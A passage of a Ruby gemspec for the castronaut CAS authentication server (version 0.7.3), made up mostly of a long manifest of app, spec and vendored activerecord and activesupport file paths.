"spec/castronaut/configuration_spec.rb",
"spec/castronaut/models/consumeable_spec.rb",
"spec/castronaut/models/dispenser_spec.rb",
"spec/castronaut/models/login_ticket_spec.rb",
"spec/castronaut/models/proxy_granting_ticket_spec.rb",
"spec/castronaut/models/proxy_ticket_spec.rb",
"spec/castronaut/models/service_ticket_spec.rb",
"spec/castronaut/models/ticket_granting_ticket_spec.rb",
"spec/castronaut/presenters/login_spec.rb",
"spec/castronaut/presenters/logout_spec.rb",
"spec/castronaut/presenters/process_login_spec.rb",
"spec/castronaut/presenters/proxy_validate_spec.rb",
"spec/castronaut/presenters/service_validate_spec.rb",
"spec/castronaut/ticket_result_spec.rb",
"spec/castronaut/utilities/random_string_spec.rb",
"spec/castronaut_spec.rb",
"spec/spec_controller_helper.rb",
"spec/spec_helper.rb",
"spec/spec_rails_mocks.rb"
]
if s.respond_to? :specification_version then
current_version = Gem::Specification::CURRENT_SPECIFICATION_VERSION
s.specification_version = 3
if Gem::Version.new(Gem::RubyGemsVersion) >= Gem::Version.new('1.2.0') then
else
end
else
end
end
Regenerated gemspec for version 0.7.3
# -*- encoding: utf-8 -*-
Gem::Specification.new do |s|
s.name = %q{castronaut}
s.version = "0.7.3"
s.required_rubygems_version = Gem::Requirement.new(">= 0") if s.respond_to? :required_rubygems_version=
s.authors = ["Relevance, Inc."]
s.date = %q{2009-05-22}
s.default_executable = %q{castronaut}
s.description = %q{Your friendly, cigar smoking authentication dicator... From Space!}
s.email = %q{aaron@thinkrelevance.com}
s.executables = ["castronaut"]
s.files = [
"MIT-LICENSE",
"README.textile",
"Rakefile",
"app/config.rb",
"app/config.ru",
"app/controllers/application.rb",
"app/public/javascripts/application.js",
"app/public/javascripts/jquery.js",
"app/public/stylesheets/screen.css",
"app/views/layout.erb",
"app/views/login.erb",
"app/views/logout.erb",
"app/views/proxy_validate.erb",
"app/views/service_validate.erb",
"bin/castronaut",
"castronaut.rb",
"config/castronaut.example.yml",
"config/castronaut.sample.yml",
"config/nginx_vhost.conf",
"config/thin_config.yml",
"lib/castronaut.rb",
"lib/castronaut/adapters.rb",
"lib/castronaut/adapters/development/adapter.rb",
"lib/castronaut/adapters/development/user.rb",
"lib/castronaut/adapters/ldap/adapter.rb",
"lib/castronaut/adapters/ldap/user.rb",
"lib/castronaut/adapters/restful_authentication/adapter.rb",
"lib/castronaut/adapters/restful_authentication/user.rb",
"lib/castronaut/authentication_result.rb",
"lib/castronaut/configuration.rb",
"lib/castronaut/db/001_create_cas_database.rb",
"lib/castronaut/models/consumeable.rb",
"lib/castronaut/models/dispenser.rb",
"lib/castronaut/models/login_ticket.rb",
"lib/castronaut/models/proxy_granting_ticket.rb",
"lib/castronaut/models/proxy_ticket.rb",
"lib/castronaut/models/service_ticket.rb",
"lib/castronaut/models/ticket_granting_ticket.rb",
"lib/castronaut/presenters/login.rb",
"lib/castronaut/presenters/logout.rb",
"lib/castronaut/presenters/process_login.rb",
"lib/castronaut/presenters/proxy_validate.rb",
"lib/castronaut/presenters/service_validate.rb",
"lib/castronaut/support/sample.rb",
"lib/castronaut/ticket_result.rb",
"lib/castronaut/utilities/random_string.rb",
"spec/app/controllers/application_spec.rb",
"spec/app/controllers/db/cas.db",
"spec/app/controllers/db/cas_adapter.db",
"spec/app/controllers/log/castronaut.log",
"spec/castronaut/adapters/development/adapter_spec.rb",
"spec/castronaut/adapters/development/user_spec.rb",
"spec/castronaut/adapters/ldap/adapter_spec.rb",
"spec/castronaut/adapters/ldap/user_spec.rb",
"spec/castronaut/adapters/restful_authentication/adapter_spec.rb",
"spec/castronaut/adapters/restful_authentication/user_spec.rb",
"spec/castronaut/adapters_spec.rb",
"spec/castronaut/authentication_result_spec.rb",
"spec/castronaut/configuration_spec.rb",
"spec/castronaut/models/consumeable_spec.rb",
"spec/castronaut/models/dispenser_spec.rb",
"spec/castronaut/models/login_ticket_spec.rb",
"spec/castronaut/models/proxy_granting_ticket_spec.rb",
"spec/castronaut/models/proxy_ticket_spec.rb",
"spec/castronaut/models/service_ticket_spec.rb",
"spec/castronaut/models/ticket_granting_ticket_spec.rb",
"spec/castronaut/presenters/login_spec.rb",
"spec/castronaut/presenters/logout_spec.rb",
"spec/castronaut/presenters/process_login_spec.rb",
"spec/castronaut/presenters/proxy_validate_spec.rb",
"spec/castronaut/presenters/service_validate_spec.rb",
"spec/castronaut/ticket_result_spec.rb",
"spec/castronaut/utilities/random_string_spec.rb",
"spec/castronaut_spec.rb",
"spec/spec.opts",
"spec/spec_controller_helper.rb",
"spec/spec_helper.rb",
"spec/spec_rails_mocks.rb",
"vendor/activerecord/CHANGELOG",
"vendor/activerecord/README",
"vendor/activerecord/RUNNING_UNIT_TESTS",
"vendor/activerecord/Rakefile",
"vendor/activerecord/examples/associations.png",
"vendor/activerecord/install.rb",
"vendor/activerecord/lib/active_record.rb",
"vendor/activerecord/lib/active_record/aggregations.rb",
"vendor/activerecord/lib/active_record/association_preload.rb",
"vendor/activerecord/lib/active_record/associations.rb",
"vendor/activerecord/lib/active_record/associations/association_collection.rb",
"vendor/activerecord/lib/active_record/associations/association_proxy.rb",
"vendor/activerecord/lib/active_record/associations/belongs_to_association.rb",
"vendor/activerecord/lib/active_record/associations/belongs_to_polymorphic_association.rb",
"vendor/activerecord/lib/active_record/associations/has_and_belongs_to_many_association.rb",
"vendor/activerecord/lib/active_record/associations/has_many_association.rb",
"vendor/activerecord/lib/active_record/associations/has_many_through_association.rb",
"vendor/activerecord/lib/active_record/associations/has_one_association.rb",
"vendor/activerecord/lib/active_record/associations/has_one_through_association.rb",
"vendor/activerecord/lib/active_record/attribute_methods.rb",
"vendor/activerecord/lib/active_record/base.rb",
"vendor/activerecord/lib/active_record/calculations.rb",
"vendor/activerecord/lib/active_record/callbacks.rb",
"vendor/activerecord/lib/active_record/connection_adapters/abstract/connection_pool.rb",
"vendor/activerecord/lib/active_record/connection_adapters/abstract/connection_specification.rb",
"vendor/activerecord/lib/active_record/connection_adapters/abstract/database_statements.rb",
"vendor/activerecord/lib/active_record/connection_adapters/abstract/query_cache.rb",
"vendor/activerecord/lib/active_record/connection_adapters/abstract/quoting.rb",
"vendor/activerecord/lib/active_record/connection_adapters/abstract/schema_definitions.rb",
"vendor/activerecord/lib/active_record/connection_adapters/abstract/schema_statements.rb",
"vendor/activerecord/lib/active_record/connection_adapters/abstract_adapter.rb",
"vendor/activerecord/lib/active_record/connection_adapters/mysql_adapter.rb",
"vendor/activerecord/lib/active_record/connection_adapters/postgresql_adapter.rb",
"vendor/activerecord/lib/active_record/connection_adapters/sqlite3_adapter.rb",
"vendor/activerecord/lib/active_record/connection_adapters/sqlite_adapter.rb",
"vendor/activerecord/lib/active_record/dirty.rb",
"vendor/activerecord/lib/active_record/dynamic_finder_match.rb",
"vendor/activerecord/lib/active_record/fixtures.rb",
"vendor/activerecord/lib/active_record/i18n_interpolation_deprecation.rb",
"vendor/activerecord/lib/active_record/locale/en.yml",
"vendor/activerecord/lib/active_record/locking/optimistic.rb",
"vendor/activerecord/lib/active_record/locking/pessimistic.rb",
"vendor/activerecord/lib/active_record/migration.rb",
"vendor/activerecord/lib/active_record/named_scope.rb",
"vendor/activerecord/lib/active_record/observer.rb",
"vendor/activerecord/lib/active_record/query_cache.rb",
"vendor/activerecord/lib/active_record/reflection.rb",
"vendor/activerecord/lib/active_record/schema.rb",
"vendor/activerecord/lib/active_record/schema_dumper.rb",
"vendor/activerecord/lib/active_record/serialization.rb",
"vendor/activerecord/lib/active_record/serializers/json_serializer.rb",
"vendor/activerecord/lib/active_record/serializers/xml_serializer.rb",
"vendor/activerecord/lib/active_record/test_case.rb",
"vendor/activerecord/lib/active_record/timestamp.rb",
"vendor/activerecord/lib/active_record/transactions.rb",
"vendor/activerecord/lib/active_record/validations.rb",
"vendor/activerecord/lib/active_record/version.rb",
"vendor/activerecord/lib/activerecord.rb",
"vendor/activerecord/test/assets/example.log",
"vendor/activerecord/test/assets/flowers.jpg",
"vendor/activerecord/test/cases/aaa_create_tables_test.rb",
"vendor/activerecord/test/cases/active_schema_test_mysql.rb",
"vendor/activerecord/test/cases/active_schema_test_postgresql.rb",
"vendor/activerecord/test/cases/adapter_test.rb",
"vendor/activerecord/test/cases/aggregations_test.rb",
"vendor/activerecord/test/cases/ar_schema_test.rb",
"vendor/activerecord/test/cases/associations/belongs_to_associations_test.rb",
"vendor/activerecord/test/cases/associations/callbacks_test.rb",
"vendor/activerecord/test/cases/associations/cascaded_eager_loading_test.rb",
"vendor/activerecord/test/cases/associations/eager_load_includes_full_sti_class_test.rb",
"vendor/activerecord/test/cases/associations/eager_load_nested_include_test.rb",
"vendor/activerecord/test/cases/associations/eager_singularization_test.rb",
"vendor/activerecord/test/cases/associations/eager_test.rb",
"vendor/activerecord/test/cases/associations/extension_test.rb",
"vendor/activerecord/test/cases/associations/has_and_belongs_to_many_associations_test.rb",
"vendor/activerecord/test/cases/associations/has_many_associations_test.rb",
"vendor/activerecord/test/cases/associations/has_many_through_associations_test.rb",
"vendor/activerecord/test/cases/associations/has_one_associations_test.rb",
"vendor/activerecord/test/cases/associations/has_one_through_associations_test.rb",
"vendor/activerecord/test/cases/associations/inner_join_association_test.rb",
"vendor/activerecord/test/cases/associations/join_model_test.rb",
"vendor/activerecord/test/cases/associations_test.rb",
"vendor/activerecord/test/cases/attribute_methods_test.rb",
"vendor/activerecord/test/cases/base_test.rb",
"vendor/activerecord/test/cases/binary_test.rb",
"vendor/activerecord/test/cases/calculations_test.rb",
"vendor/activerecord/test/cases/callbacks_observers_test.rb",
"vendor/activerecord/test/cases/callbacks_test.rb",
"vendor/activerecord/test/cases/class_inheritable_attributes_test.rb",
"vendor/activerecord/test/cases/column_alias_test.rb",
"vendor/activerecord/test/cases/column_definition_test.rb",
"vendor/activerecord/test/cases/connection_test_firebird.rb",
"vendor/activerecord/test/cases/connection_test_mysql.rb",
"vendor/activerecord/test/cases/copy_table_test_sqlite.rb",
"vendor/activerecord/test/cases/database_statements_test.rb",
"vendor/activerecord/test/cases/datatype_test_postgresql.rb",
"vendor/activerecord/test/cases/date_time_test.rb",
"vendor/activerecord/test/cases/default_test_firebird.rb",
"vendor/activerecord/test/cases/defaults_test.rb",
"vendor/activerecord/test/cases/deprecated_finder_test.rb",
"vendor/activerecord/test/cases/dirty_test.rb",
"vendor/activerecord/test/cases/finder_respond_to_test.rb",
"vendor/activerecord/test/cases/finder_test.rb",
"vendor/activerecord/test/cases/fixtures_test.rb",
"vendor/activerecord/test/cases/helper.rb",
"vendor/activerecord/test/cases/i18n_test.rb",
"vendor/activerecord/test/cases/inheritance_test.rb",
"vendor/activerecord/test/cases/invalid_date_test.rb",
"vendor/activerecord/test/cases/json_serialization_test.rb",
"vendor/activerecord/test/cases/lifecycle_test.rb",
"vendor/activerecord/test/cases/locking_test.rb",
"vendor/activerecord/test/cases/method_scoping_test.rb",
"vendor/activerecord/test/cases/migration_test.rb",
"vendor/activerecord/test/cases/migration_test_firebird.rb",
"vendor/activerecord/test/cases/mixin_test.rb",
"vendor/activerecord/test/cases/modules_test.rb",
"vendor/activerecord/test/cases/multiple_db_test.rb",
"vendor/activerecord/test/cases/named_scope_test.rb",
"vendor/activerecord/test/cases/pk_test.rb",
"vendor/activerecord/test/cases/pooled_connections_test.rb",
"vendor/activerecord/test/cases/query_cache_test.rb",
"vendor/activerecord/test/cases/readonly_test.rb",
"vendor/activerecord/test/cases/reflection_test.rb",
"vendor/activerecord/test/cases/reload_models_test.rb",
"vendor/activerecord/test/cases/reserved_word_test_mysql.rb",
"vendor/activerecord/test/cases/sanitize_test.rb",
"vendor/activerecord/test/cases/schema_authorization_test_postgresql.rb",
"vendor/activerecord/test/cases/schema_dumper_test.rb",
"vendor/activerecord/test/cases/schema_test_postgresql.rb",
"vendor/activerecord/test/cases/serialization_test.rb",
"vendor/activerecord/test/cases/synonym_test_oracle.rb",
"vendor/activerecord/test/cases/transactions_test.rb",
"vendor/activerecord/test/cases/unconnected_test.rb",
"vendor/activerecord/test/cases/validations_i18n_test.rb",
"vendor/activerecord/test/cases/validations_test.rb",
"vendor/activerecord/test/cases/xml_serialization_test.rb",
"vendor/activerecord/test/config.rb",
"vendor/activerecord/test/connections/native_db2/connection.rb",
"vendor/activerecord/test/connections/native_firebird/connection.rb",
"vendor/activerecord/test/connections/native_frontbase/connection.rb",
"vendor/activerecord/test/connections/native_mysql/connection.rb",
"vendor/activerecord/test/connections/native_openbase/connection.rb",
"vendor/activerecord/test/connections/native_oracle/connection.rb",
"vendor/activerecord/test/connections/native_postgresql/connection.rb",
"vendor/activerecord/test/connections/native_sqlite/connection.rb",
"vendor/activerecord/test/connections/native_sqlite3/connection.rb",
"vendor/activerecord/test/connections/native_sqlite3/in_memory_connection.rb",
"vendor/activerecord/test/connections/native_sybase/connection.rb",
"vendor/activerecord/test/fixtures/accounts.yml",
"vendor/activerecord/test/fixtures/all/developers.yml",
"vendor/activerecord/test/fixtures/all/people.csv",
"vendor/activerecord/test/fixtures/all/tasks.yml",
"vendor/activerecord/test/fixtures/author_addresses.yml",
"vendor/activerecord/test/fixtures/author_favorites.yml",
"vendor/activerecord/test/fixtures/authors.yml",
"vendor/activerecord/test/fixtures/binaries.yml",
"vendor/activerecord/test/fixtures/books.yml",
"vendor/activerecord/test/fixtures/categories.yml",
"vendor/activerecord/test/fixtures/categories/special_categories.yml",
"vendor/activerecord/test/fixtures/categories/subsubdir/arbitrary_filename.yml",
"vendor/activerecord/test/fixtures/categories_ordered.yml",
"vendor/activerecord/test/fixtures/categories_posts.yml",
"vendor/activerecord/test/fixtures/categorizations.yml",
"vendor/activerecord/test/fixtures/clubs.yml",
"vendor/activerecord/test/fixtures/comments.yml",
"vendor/activerecord/test/fixtures/companies.yml",
"vendor/activerecord/test/fixtures/computers.yml",
"vendor/activerecord/test/fixtures/courses.yml",
"vendor/activerecord/test/fixtures/customers.yml",
"vendor/activerecord/test/fixtures/developers.yml",
"vendor/activerecord/test/fixtures/developers_projects.yml",
"vendor/activerecord/test/fixtures/edges.yml",
"vendor/activerecord/test/fixtures/entrants.yml",
"vendor/activerecord/test/fixtures/fixture_database.sqlite3",
"vendor/activerecord/test/fixtures/fixture_database_2.sqlite3",
"vendor/activerecord/test/fixtures/fk_test_has_fk.yml",
"vendor/activerecord/test/fixtures/fk_test_has_pk.yml",
"vendor/activerecord/test/fixtures/funny_jokes.yml",
"vendor/activerecord/test/fixtures/items.yml",
"vendor/activerecord/test/fixtures/jobs.yml",
"vendor/activerecord/test/fixtures/legacy_things.yml",
"vendor/activerecord/test/fixtures/mateys.yml",
"vendor/activerecord/test/fixtures/members.yml",
"vendor/activerecord/test/fixtures/memberships.yml",
"vendor/activerecord/test/fixtures/minimalistics.yml",
"vendor/activerecord/test/fixtures/mixed_case_monkeys.yml",
"vendor/activerecord/test/fixtures/mixins.yml",
"vendor/activerecord/test/fixtures/movies.yml",
"vendor/activerecord/test/fixtures/naked/csv/accounts.csv",
"vendor/activerecord/test/fixtures/naked/yml/accounts.yml",
"vendor/activerecord/test/fixtures/naked/yml/companies.yml",
"vendor/activerecord/test/fixtures/naked/yml/courses.yml",
"vendor/activerecord/test/fixtures/organizations.yml",
"vendor/activerecord/test/fixtures/owners.yml",
"vendor/activerecord/test/fixtures/parrots.yml",
"vendor/activerecord/test/fixtures/parrots_pirates.yml",
"vendor/activerecord/test/fixtures/people.yml",
"vendor/activerecord/test/fixtures/pets.yml",
"vendor/activerecord/test/fixtures/pirates.yml",
"vendor/activerecord/test/fixtures/posts.yml",
"vendor/activerecord/test/fixtures/price_estimates.yml",
"vendor/activerecord/test/fixtures/projects.yml",
"vendor/activerecord/test/fixtures/readers.yml",
"vendor/activerecord/test/fixtures/references.yml",
"vendor/activerecord/test/fixtures/reserved_words/distinct.yml",
"vendor/activerecord/test/fixtures/reserved_words/distincts_selects.yml",
"vendor/activerecord/test/fixtures/reserved_words/group.yml",
"vendor/activerecord/test/fixtures/reserved_words/select.yml",
"vendor/activerecord/test/fixtures/reserved_words/values.yml",
"vendor/activerecord/test/fixtures/ships.yml",
"vendor/activerecord/test/fixtures/sponsors.yml",
"vendor/activerecord/test/fixtures/subscribers.yml",
"vendor/activerecord/test/fixtures/subscriptions.yml",
"vendor/activerecord/test/fixtures/taggings.yml",
"vendor/activerecord/test/fixtures/tags.yml",
"vendor/activerecord/test/fixtures/tasks.yml",
"vendor/activerecord/test/fixtures/topics.yml",
"vendor/activerecord/test/fixtures/treasures.yml",
"vendor/activerecord/test/fixtures/vertices.yml",
"vendor/activerecord/test/fixtures/warehouse-things.yml",
"vendor/activerecord/test/migrations/broken/100_migration_that_raises_exception.rb",
"vendor/activerecord/test/migrations/decimal/1_give_me_big_numbers.rb",
"vendor/activerecord/test/migrations/duplicate/1_people_have_last_names.rb",
"vendor/activerecord/test/migrations/duplicate/2_we_need_reminders.rb",
"vendor/activerecord/test/migrations/duplicate/3_foo.rb",
"vendor/activerecord/test/migrations/duplicate/3_innocent_jointable.rb",
"vendor/activerecord/test/migrations/duplicate_names/20080507052938_chunky.rb",
"vendor/activerecord/test/migrations/duplicate_names/20080507053028_chunky.rb",
"vendor/activerecord/test/migrations/interleaved/pass_1/3_innocent_jointable.rb",
"vendor/activerecord/test/migrations/interleaved/pass_2/1_people_have_last_names.rb",
"vendor/activerecord/test/migrations/interleaved/pass_2/3_innocent_jointable.rb",
"vendor/activerecord/test/migrations/interleaved/pass_3/1_people_have_last_names.rb",
"vendor/activerecord/test/migrations/interleaved/pass_3/2_i_raise_on_down.rb",
"vendor/activerecord/test/migrations/interleaved/pass_3/3_innocent_jointable.rb",
"vendor/activerecord/test/migrations/missing/1000_people_have_middle_names.rb",
"vendor/activerecord/test/migrations/missing/1_people_have_last_names.rb",
"vendor/activerecord/test/migrations/missing/3_we_need_reminders.rb",
"vendor/activerecord/test/migrations/missing/4_innocent_jointable.rb",
"vendor/activerecord/test/migrations/valid/1_people_have_last_names.rb",
"vendor/activerecord/test/migrations/valid/2_we_need_reminders.rb",
"vendor/activerecord/test/migrations/valid/3_innocent_jointable.rb",
"vendor/activerecord/test/models/author.rb",
"vendor/activerecord/test/models/auto_id.rb",
"vendor/activerecord/test/models/binary.rb",
"vendor/activerecord/test/models/book.rb",
"vendor/activerecord/test/models/categorization.rb",
"vendor/activerecord/test/models/category.rb",
"vendor/activerecord/test/models/citation.rb",
"vendor/activerecord/test/models/club.rb",
"vendor/activerecord/test/models/column_name.rb",
"vendor/activerecord/test/models/comment.rb",
"vendor/activerecord/test/models/company.rb",
"vendor/activerecord/test/models/company_in_module.rb",
"vendor/activerecord/test/models/computer.rb",
"vendor/activerecord/test/models/contact.rb",
"vendor/activerecord/test/models/course.rb",
"vendor/activerecord/test/models/customer.rb",
"vendor/activerecord/test/models/default.rb",
"vendor/activerecord/test/models/developer.rb",
"vendor/activerecord/test/models/edge.rb",
"vendor/activerecord/test/models/entrant.rb",
"vendor/activerecord/test/models/guid.rb",
"vendor/activerecord/test/models/item.rb",
"vendor/activerecord/test/models/job.rb",
"vendor/activerecord/test/models/joke.rb",
"vendor/activerecord/test/models/keyboard.rb",
"vendor/activerecord/test/models/legacy_thing.rb",
"vendor/activerecord/test/models/matey.rb",
"vendor/activerecord/test/models/member.rb",
"vendor/activerecord/test/models/member_detail.rb",
"vendor/activerecord/test/models/membership.rb",
"vendor/activerecord/test/models/minimalistic.rb",
"vendor/activerecord/test/models/mixed_case_monkey.rb",
"vendor/activerecord/test/models/movie.rb",
"vendor/activerecord/test/models/order.rb",
"vendor/activerecord/test/models/organization.rb",
"vendor/activerecord/test/models/owner.rb",
"vendor/activerecord/test/models/parrot.rb",
"vendor/activerecord/test/models/person.rb",
"vendor/activerecord/test/models/pet.rb",
"vendor/activerecord/test/models/pirate.rb",
"vendor/activerecord/test/models/post.rb",
"vendor/activerecord/test/models/price_estimate.rb",
"vendor/activerecord/test/models/project.rb",
"vendor/activerecord/test/models/reader.rb",
"vendor/activerecord/test/models/reference.rb",
"vendor/activerecord/test/models/reply.rb",
"vendor/activerecord/test/models/ship.rb",
"vendor/activerecord/test/models/sponsor.rb",
"vendor/activerecord/test/models/subject.rb",
"vendor/activerecord/test/models/subscriber.rb",
"vendor/activerecord/test/models/subscription.rb",
"vendor/activerecord/test/models/tag.rb",
"vendor/activerecord/test/models/tagging.rb",
"vendor/activerecord/test/models/task.rb",
"vendor/activerecord/test/models/topic.rb",
"vendor/activerecord/test/models/treasure.rb",
"vendor/activerecord/test/models/vertex.rb",
"vendor/activerecord/test/models/warehouse_thing.rb",
"vendor/activerecord/test/schema/mysql_specific_schema.rb",
"vendor/activerecord/test/schema/postgresql_specific_schema.rb",
"vendor/activerecord/test/schema/schema.rb",
"vendor/activerecord/test/schema/schema2.rb",
"vendor/activerecord/test/schema/sqlite_specific_schema.rb",
"vendor/activesupport/CHANGELOG",
"vendor/activesupport/README",
"vendor/activesupport/lib/active_support.rb",
"vendor/activesupport/lib/active_support/base64.rb",
"vendor/activesupport/lib/active_support/basic_object.rb",
"vendor/activesupport/lib/active_support/buffered_logger.rb",
"vendor/activesupport/lib/active_support/cache.rb",
"vendor/activesupport/lib/active_support/cache/compressed_mem_cache_store.rb",
"vendor/activesupport/lib/active_support/cache/drb_store.rb",
"vendor/activesupport/lib/active_support/cache/file_store.rb",
"vendor/activesupport/lib/active_support/cache/mem_cache_store.rb",
"vendor/activesupport/lib/active_support/cache/memory_store.rb",
"vendor/activesupport/lib/active_support/cache/synchronized_memory_store.rb",
"vendor/activesupport/lib/active_support/callbacks.rb",
"vendor/activesupport/lib/active_support/core_ext.rb",
"vendor/activesupport/lib/active_support/core_ext/array.rb",
"vendor/activesupport/lib/active_support/core_ext/array/access.rb",
"vendor/activesupport/lib/active_support/core_ext/array/conversions.rb",
"vendor/activesupport/lib/active_support/core_ext/array/extract_options.rb",
"vendor/activesupport/lib/active_support/core_ext/array/grouping.rb",
"vendor/activesupport/lib/active_support/core_ext/array/random_access.rb",
"vendor/activesupport/lib/active_support/core_ext/base64.rb",
"vendor/activesupport/lib/active_support/core_ext/base64/encoding.rb",
"vendor/activesupport/lib/active_support/core_ext/benchmark.rb",
"vendor/activesupport/lib/active_support/core_ext/bigdecimal.rb",
"vendor/activesupport/lib/active_support/core_ext/bigdecimal/conversions.rb",
"vendor/activesupport/lib/active_support/core_ext/blank.rb",
"vendor/activesupport/lib/active_support/core_ext/cgi.rb",
"vendor/activesupport/lib/active_support/core_ext/cgi/escape_skipping_slashes.rb",
"vendor/activesupport/lib/active_support/core_ext/class.rb",
"vendor/activesupport/lib/active_support/core_ext/class/attribute_accessors.rb",
"vendor/activesupport/lib/active_support/core_ext/class/delegating_attributes.rb",
"vendor/activesupport/lib/active_support/core_ext/class/inheritable_attributes.rb",
"vendor/activesupport/lib/active_support/core_ext/class/removal.rb",
"vendor/activesupport/lib/active_support/core_ext/date.rb",
"vendor/activesupport/lib/active_support/core_ext/date/behavior.rb",
"vendor/activesupport/lib/active_support/core_ext/date/calculations.rb",
"vendor/activesupport/lib/active_support/core_ext/date/conversions.rb",
"vendor/activesupport/lib/active_support/core_ext/date_time.rb",
"vendor/activesupport/lib/active_support/core_ext/date_time/calculations.rb",
"vendor/activesupport/lib/active_support/core_ext/date_time/conversions.rb",
"vendor/activesupport/lib/active_support/core_ext/duplicable.rb",
"vendor/activesupport/lib/active_support/core_ext/enumerable.rb",
"vendor/activesupport/lib/active_support/core_ext/exception.rb",
"vendor/activesupport/lib/active_support/core_ext/file.rb",
"vendor/activesupport/lib/active_support/core_ext/file/atomic.rb",
"vendor/activesupport/lib/active_support/core_ext/float.rb",
"vendor/activesupport/lib/active_support/core_ext/float/rounding.rb",
"vendor/activesupport/lib/active_support/core_ext/float/time.rb",
"vendor/activesupport/lib/active_support/core_ext/hash.rb",
"vendor/activesupport/lib/active_support/core_ext/hash/conversions.rb",
"vendor/activesupport/lib/active_support/core_ext/hash/deep_merge.rb",
"vendor/activesupport/lib/active_support/core_ext/hash/diff.rb",
"vendor/activesupport/lib/active_support/core_ext/hash/except.rb",
"vendor/activesupport/lib/active_support/core_ext/hash/indifferent_access.rb",
"vendor/activesupport/lib/active_support/core_ext/hash/keys.rb",
"vendor/activesupport/lib/active_support/core_ext/hash/reverse_merge.rb",
"vendor/activesupport/lib/active_support/core_ext/hash/slice.rb",
"vendor/activesupport/lib/active_support/core_ext/integer.rb",
"vendor/activesupport/lib/active_support/core_ext/integer/even_odd.rb",
"vendor/activesupport/lib/active_support/core_ext/integer/inflections.rb",
"vendor/activesupport/lib/active_support/core_ext/integer/time.rb",
"vendor/activesupport/lib/active_support/core_ext/kernel.rb",
"vendor/activesupport/lib/active_support/core_ext/kernel/agnostics.rb",
"vendor/activesupport/lib/active_support/core_ext/kernel/daemonizing.rb",
"vendor/activesupport/lib/active_support/core_ext/kernel/debugger.rb",
"vendor/activesupport/lib/active_support/core_ext/kernel/reporting.rb",
"vendor/activesupport/lib/active_support/core_ext/kernel/requires.rb",
"vendor/activesupport/lib/active_support/core_ext/load_error.rb",
"vendor/activesupport/lib/active_support/core_ext/logger.rb",
"vendor/activesupport/lib/active_support/core_ext/module.rb",
"vendor/activesupport/lib/active_support/core_ext/module/aliasing.rb",
"vendor/activesupport/lib/active_support/core_ext/module/attr_accessor_with_default.rb",
"vendor/activesupport/lib/active_support/core_ext/module/attr_internal.rb",
"vendor/activesupport/lib/active_support/core_ext/module/attribute_accessors.rb",
"vendor/activesupport/lib/active_support/core_ext/module/delegation.rb",
"vendor/activesupport/lib/active_support/core_ext/module/inclusion.rb",
"vendor/activesupport/lib/active_support/core_ext/module/introspection.rb",
"vendor/activesupport/lib/active_support/core_ext/module/loading.rb",
"vendor/activesupport/lib/active_support/core_ext/module/model_naming.rb",
"vendor/activesupport/lib/active_support/core_ext/module/synchronization.rb",
"vendor/activesupport/lib/active_support/core_ext/name_error.rb",
"vendor/activesupport/lib/active_support/core_ext/numeric.rb",
"vendor/activesupport/lib/active_support/core_ext/numeric/bytes.rb",
"vendor/activesupport/lib/active_support/core_ext/numeric/conversions.rb",
"vendor/activesupport/lib/active_support/core_ext/numeric/time.rb",
"vendor/activesupport/lib/active_support/core_ext/object.rb",
"vendor/activesupport/lib/active_support/core_ext/object/conversions.rb",
"vendor/activesupport/lib/active_support/core_ext/object/extending.rb",
"vendor/activesupport/lib/active_support/core_ext/object/instance_variables.rb",
"vendor/activesupport/lib/active_support/core_ext/object/metaclass.rb",
"vendor/activesupport/lib/active_support/core_ext/object/misc.rb",
"vendor/activesupport/lib/active_support/core_ext/pathname.rb",
"vendor/activesupport/lib/active_support/core_ext/pathname/clean_within.rb",
"vendor/activesupport/lib/active_support/core_ext/proc.rb",
"vendor/activesupport/lib/active_support/core_ext/process.rb",
"vendor/activesupport/lib/active_support/core_ext/process/daemon.rb",
"vendor/activesupport/lib/active_support/core_ext/range.rb",
"vendor/activesupport/lib/active_support/core_ext/range/blockless_step.rb",
"vendor/activesupport/lib/active_support/core_ext/range/conversions.rb",
"vendor/activesupport/lib/active_support/core_ext/range/include_range.rb",
"vendor/activesupport/lib/active_support/core_ext/range/overlaps.rb",
"vendor/activesupport/lib/active_support/core_ext/rexml.rb",
"vendor/activesupport/lib/active_support/core_ext/string.rb",
"vendor/activesupport/lib/active_support/core_ext/string/access.rb",
"vendor/activesupport/lib/active_support/core_ext/string/behavior.rb",
"vendor/activesupport/lib/active_support/core_ext/string/conversions.rb",
"vendor/activesupport/lib/active_support/core_ext/string/filters.rb",
"vendor/activesupport/lib/active_support/core_ext/string/inflections.rb",
"vendor/activesupport/lib/active_support/core_ext/string/iterators.rb",
"vendor/activesupport/lib/active_support/core_ext/string/multibyte.rb",
"vendor/activesupport/lib/active_support/core_ext/string/starts_ends_with.rb",
"vendor/activesupport/lib/active_support/core_ext/string/xchar.rb",
"vendor/activesupport/lib/active_support/core_ext/symbol.rb",
"vendor/activesupport/lib/active_support/core_ext/time.rb",
"vendor/activesupport/lib/active_support/core_ext/time/behavior.rb",
"vendor/activesupport/lib/active_support/core_ext/time/calculations.rb",
"vendor/activesupport/lib/active_support/core_ext/time/conversions.rb",
"vendor/activesupport/lib/active_support/core_ext/time/zones.rb",
"vendor/activesupport/lib/active_support/dependencies.rb",
"vendor/activesupport/lib/active_support/deprecation.rb",
"vendor/activesupport/lib/active_support/duration.rb",
"vendor/activesupport/lib/active_support/gzip.rb",
"vendor/activesupport/lib/active_support/inflections.rb",
"vendor/activesupport/lib/active_support/inflector.rb",
"vendor/activesupport/lib/active_support/json.rb",
"vendor/activesupport/lib/active_support/json/decoding.rb",
"vendor/activesupport/lib/active_support/json/encoders/date.rb",
"vendor/activesupport/lib/active_support/json/encoders/date_time.rb",
"vendor/activesupport/lib/active_support/json/encoders/enumerable.rb",
"vendor/activesupport/lib/active_support/json/encoders/false_class.rb",
"vendor/activesupport/lib/active_support/json/encoders/hash.rb",
"vendor/activesupport/lib/active_support/json/encoders/nil_class.rb",
"vendor/activesupport/lib/active_support/json/encoders/numeric.rb",
"vendor/activesupport/lib/active_support/json/encoders/object.rb",
"vendor/activesupport/lib/active_support/json/encoders/regexp.rb",
"vendor/activesupport/lib/active_support/json/encoders/string.rb",
"vendor/activesupport/lib/active_support/json/encoders/symbol.rb",
"vendor/activesupport/lib/active_support/json/encoders/time.rb",
"vendor/activesupport/lib/active_support/json/encoders/true_class.rb",
"vendor/activesupport/lib/active_support/json/encoding.rb",
"vendor/activesupport/lib/active_support/json/variable.rb",
"vendor/activesupport/lib/active_support/locale/en.yml",
"vendor/activesupport/lib/active_support/memoizable.rb",
"vendor/activesupport/lib/active_support/multibyte.rb",
"vendor/activesupport/lib/active_support/multibyte/chars.rb",
